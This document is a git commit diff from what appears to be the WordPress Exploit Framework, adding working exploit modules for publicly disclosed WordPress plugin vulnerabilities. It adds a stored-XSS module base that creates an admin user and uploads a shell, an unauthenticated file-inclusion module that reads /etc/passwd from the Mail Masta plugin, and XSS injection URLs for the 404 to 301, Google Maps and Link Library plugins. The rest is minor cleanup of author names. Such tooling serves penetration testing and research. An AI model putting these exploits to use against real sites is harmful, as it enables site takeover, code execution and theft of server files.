Merged development into master

rastating · rastating · commit cb1a19568301 · 2016-09-11T16:09:01.000+01:00
diff --git a/.gitignore b/.gitignore
@@ -92,3 +92,14 @@ sftp-config.json
 # Atom Plugins
 deployment-config.json
 Gemfile.lock
+
+# NPM
+node_modules/
+npm-debug.log
+
+# TypeScript type defs
+typings/
+
+# Compiled Angular TypeScript
+lib/web/public/app/**/*.js
+lib/web/public/app/**/*.map
diff --git a/lib/wpxf/core.rb b/lib/wpxf/core.rb
@@ -29,6 +29,7 @@
 require 'wpxf/wordpress/xss'
 require 'wpxf/wordpress/reflected_xss'
 require 'wpxf/wordpress/staged_reflected_xss'
+require 'wpxf/wordpress/stored_xss'
 require 'wpxf/wordpress/shell_upload'
 require 'wpxf/wordpress/file_download'
 
diff --git a/lib/wpxf/net/http_response.rb b/lib/wpxf/net/http_response.rb
@@ -15,7 +15,7 @@ def parse_typhoeus_response(res)
         self.body = res.body.nil? ? '' : res.body
         self.headers = res.headers
         self.timed_out = res.timed_out? || res.return_code == :couldnt_connect
-        self.cookies = CookieJar.new.parse(res.headers['Set-Cookie'])
+        self.cookies = CookieJar.new.parse(res.headers['Set-Cookie']) if res.headers
       end
 
       # @return [Boolean] a boolean that indicates whether a request timed out.
diff --git a/lib/wpxf/wordpress/reflected_xss.rb b/lib/wpxf/wordpress/reflected_xss.rb
@@ -17,7 +17,7 @@ def initialize
   # @return [Boolean] true if successful.
   def run
     unless respond_to? 'url_with_xss'
-      fail 'Required method "url_with_xss" has not been implemented'
+      raise 'Required method "url_with_xss" has not been implemented'
     end
 
     return false unless super
diff --git a/lib/wpxf/wordpress/shell_upload.rb b/lib/wpxf/wordpress/shell_upload.rb
@@ -75,6 +75,13 @@ def run
     true
   end
 
+  # Execute the payload at the specified address.
+  # @param payload_url [String] the payload URL to access.
+  def execute_payload(payload_url)
+    res = execute_get_request(url: payload_url, cookie: @session_cookie)
+    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
+  end
+
   private
 
   def payload_name_length
@@ -100,9 +107,4 @@ def upload_payload(builder)
 
     true
   end
-
-  def execute_payload(payload_url)
-    res = execute_get_request(url: payload_url, cookie: @session_cookie)
-    emit_success "Result: #{res.body}" if res && res.code == 200 && !res.body.strip.empty?
-  end
 end
diff --git a/lib/wpxf/wordpress/stored_xss.rb b/lib/wpxf/wordpress/stored_xss.rb
@@ -0,0 +1,56 @@
+# Provides reusable functionality for stored XSS modules.
+module Wpxf::WordPress::StoredXss
+  include Wpxf::WordPress::Xss
+
+  # Initialize a new instance of {StoredXss}.
+  def initialize
+    super
+    @success = false
+    @info[:desc] = 'This module stores a script in the target system that '\
+                   'will execute when an admin user views the vulnerable page, '\
+                   'which in turn, will create a new admin user to upload '\
+                   'and execute the selected payload in the context of the '\
+                   'web server.'
+  end
+
+  # @return [String] the URL or name of the page an admin user must view to execute the script.
+  def vulnerable_page
+    'a vulnerable page'
+  end
+
+  # Abstract method which must be implemented to store the XSS include script.
+  # @return [Wpxf::Net::HttpResponse] the HTTP response to the request to store the script.
+  def store_script
+    raise 'Required method "store_script" has not been implemented'
+  end
+
+  # Call #store_script and validate the response.
+  # @return [Boolea] return true if the script was successfully stored.
+  def store_script_and_validate
+    res = store_script
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    return true if res.code == 200
+
+    emit_error "Server responded with code #{res.code}"
+    false
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+
+    emit_info 'Storing script...'
+    return false unless store_script_and_validate
+
+    emit_success "Script stored and will be executed when a user views #{vulnerable_page}"
+    start_http_server
+
+    xss_shell_success
+  end
+end
diff --git a/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb b/modules/auxiliary/mail_masta_unauthenticated_local_file_inclusion.rb
@@ -0,0 +1,43 @@
+class Wpxf::Auxiliary::MailMastaUnauthenticatedLocalFileInclusion < Wpxf::Module
+  include Wpxf::WordPress::FileDownload
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Mail Masta Unauthenticated Local File Inclusion',
+      author: [
+        'Guillermo Garcia Marcos',         # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      desc: 'This module exploits a vulnerability which allows you to include any arbitrary file '\
+            'accessible by the user the web server is running as into the executing script.',
+      references: [
+        ['WPVDB', '8609'],
+        ['EDB', '40290'],
+        ['URL', 'https://cxsecurity.com/issue/WLB-2016080220']
+      ],
+      date: 'Aug 23 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('mail-masta')
+  end
+
+  def working_directory
+    'wp-content/plugins/mail-masta/inc/campaign'
+  end
+
+  def default_remote_file_path
+    '/etc/passwd'
+  end
+
+  def downloader_url
+    normalize_uri(full_uri, working_directory, 'count_of_send.php')
+  end
+
+  def download_request_params
+    { pl: remote_file }
+  end
+end
diff --git a/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb b/modules/exploits/ajax_random_post_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'AJAX Random Post <= 2.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb b/modules/exploits/anti_plagiarism_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Anti Plagiarism <= 3.60 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb b/modules/exploits/defa_online_image_protector_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Defa Online Image Protector <= 3.3 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb b/modules/exploits/easy_contact_form_builder_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Easy Contact Form Builder <= 1.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb b/modules/exploits/enhanced_tooltip_glossary_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Enhanced Tootip Glossary <= 3.3.4 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb b/modules/exploits/four04_to_three01_stored_xss_shell_upload.rb
@@ -0,0 +1,48 @@
+class Wpxf::Exploit::Four04ToThree01StoredXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::Xss
+
+  def initialize
+    super
+
+    update_info(
+      name: '404 to 301 <= 2.3.0 XSS Shell Upload',
+      author: [
+        'ldionmarcil',                    # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8611'],
+        ['URL', 'https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23']
+      ],
+      date: 'Aug 27 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('404-to-301', '2.3.1')
+  end
+
+  def run
+    return false unless super
+
+    emit_info 'Storing script...'
+    res = execute_get_request(
+      url: normalize_uri(full_uri, "?p=#{Utility::Text.rand_numeric(11)}\"><script>#{xss_include_script}</script>")
+    )
+
+    if res.nil?
+      emit_error 'No response from the target'
+      return false
+    end
+
+    if res.code != 200
+      emit_error "Server responded with code #{res.code}"
+      return false
+    end
+
+    emit_success 'Script stored and will be executed when a user views the 404 to 301 redirect logs'
+    start_http_server
+
+    xss_shell_success
+  end
+end
diff --git a/modules/exploits/google_maps_reflected_xss_shell_upload.rb b/modules/exploits/google_maps_reflected_xss_shell_upload.rb
@@ -0,0 +1,32 @@
+class Wpxf::Exploit::GoogleMapsReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Google Maps <= 2.1.3 Reflected XSS Shell Upload',
+      author: [
+        'Julien Rentrop',                 # Discovery
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8600'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_maps_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('google-maps', '2.1.4')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=hugeitgooglemaps_main&task=edit_cat&id=1%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
+  end
+end
diff --git a/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb b/modules/exploits/hdw_tube_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'HDW WordPress Video Gallery (HDW Tube) <= 1.2 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb b/modules/exploits/hero_maps_pro_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Hero Maps Pro <= 2.1.0 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/indexisto_reflected_xss_shell_upload.rb b/modules/exploits/indexisto_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Indexisto <= 1.0.5 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb b/modules/exploits/infusionsoft_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Infusionsoft Gravity Forms <= 1.5.11 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/link_library_reflected_xss_shell_upload.rb b/modules/exploits/link_library_reflected_xss_shell_upload.rb
@@ -0,0 +1,31 @@
+class Wpxf::Exploit::LinkLibraryReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Link Library <= 5.9.12.29 Reflected XSS Shell Upload',
+      author: [
+        'Burak Kelebek',                  # Disclosure
+        'Rob Carr <rob[at]rastating.com>' # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8604'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_link_library_wordpress_plugin.html']
+      ],
+      date: 'Aug 15 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('link-library', 'readme.txt', '5.9.12.30')
+  end
+
+  def url_with_xss
+    normalize_uri(
+      wordpress_url_admin,
+      "admin.php?page=link-library-settingssets&messages=9&successimportcount=1%22%2F%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E&currenttab=importexport"
+    )
+  end
+end
diff --git a/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb b/modules/exploits/minimax_page_layout_builder_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'MiniMax Page Layout Builder <= 2.0.2 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb b/modules/exploits/new_year_firework_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'New Year Firework <= 1.1.9 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb b/modules/exploits/pondol_form_to_mail_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Pondol Form to Mail <= 1.1 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb b/modules/exploits/simpel_reserveren_reflected_xss_shell_upload.rb
@@ -7,7 +7,7 @@ def initialize
     update_info(
       name: 'Simpel Reserveren <= 3.5.3 Reflected XSS Shell Upload',
       author: [
-        'Larry W. Cashdollar,',           # Discovery
+        'Larry W. Cashdollar',            # Discovery
         'Rob Carr <rob[at]rastating.com>' # WPXF module
       ],
       references: [
diff --git a/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb b/modules/exploits/tidio_gallery_reflected_xss_shell_upload.rb
diff --git a/modules/exploits/whizz_reflected_xss_shell_upload.rb b/modules/exploits/whizz_reflected_xss_shell_upload.rb
diff --git a/modules/exploits/wp_piwik_stored_xss_shell_upload.rb b/modules/exploits/wp_piwik_stored_xss_shell_upload.rb
diff --git a/modules/exploits/wpsolr_reflected_xss_shell_upload.rb b/modules/exploits/wpsolr_reflected_xss_shell_upload.rb
diff --git a/modules/exploits/wsecure_lite_shell_upload.rb b/modules/exploits/wsecure_lite_shell_upload.rb
diff --git a/spec/wordpress/stored_xss_spec.rb b/spec/wordpress/stored_xss_spec.rb
